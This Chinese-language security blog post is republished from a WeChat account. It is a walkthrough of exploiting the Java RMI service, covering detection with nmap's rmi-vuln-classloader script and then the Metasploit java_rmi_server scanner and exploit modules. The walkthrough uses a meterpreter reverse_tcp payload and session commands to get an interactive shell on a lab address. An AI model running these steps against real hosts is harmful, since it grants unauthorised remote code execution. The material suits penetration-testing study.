JAVA RMI的漏洞利用

admin 2022年10月7日20:28:28评论95 views字数 652阅读2分10秒阅读模式

JAVA RMI的漏洞利用

秋的清高里有着恬淡,旷远里有着精深,静谧里有着清净,厚重里有着博大。
--林语堂
JAVA RMI 全称 JAVA Remote Method Invocation(JAVA远程方法调用),是一种JAVA API远程调用机制。其开放默认端口是1099。听说一般在内网居多。通过空间探测工具查找,在公网上可查找到10806台。

JAVA RMI的漏洞利用

我们先使用nmap进行探测端口:

JAVA RMI的漏洞利用

还可以使用nmap进行漏洞探测:

nmap --script=rmi-vuln-classloader ip -p port

JAVA RMI的漏洞利用

对漏洞的探测,Metasploitable也具备扫描模块。先查找java rmi漏洞扫描模块

search java_rmi

JAVA RMI的漏洞利用

使用监听模块

use auxiliary/scanner/misc/java_rmi_server

JAVA RMI的漏洞利用

配置好目标ip,执行,可以查看到漏洞存在。

set rhosts 192.168.52.82run

JAVA RMI的漏洞利用

接着切换漏洞利用模块

use exploit/multi/misc/java_rmi_server

JAVA RMI的漏洞利用

除了设置好目标RHOSTS外,还需要设置监听模块。

Set payload /java/meterpreter/reverse_tcp

JAVA RMI的漏洞利用

执行成功。执行多次,建立的sessions通过exp打完后都会断掉。这时候需要查看sessions

JAVA RMI的漏洞利用

查看sessions。

JAVA RMI的漏洞利用

可通过"session -i"来查看所有已建立的会话,通过 -i 后接ID值可以选择建立的会话,最后执行shell获取交互。如图:
JAVA RMI的漏洞利用

原文始发于微信公众号(Enginge):JAVA RMI的漏洞利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月7日20:28:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JAVA RMI的漏洞利用https://cn-sec.com/archives/1335484.html

发表评论

匿名网友 填写信息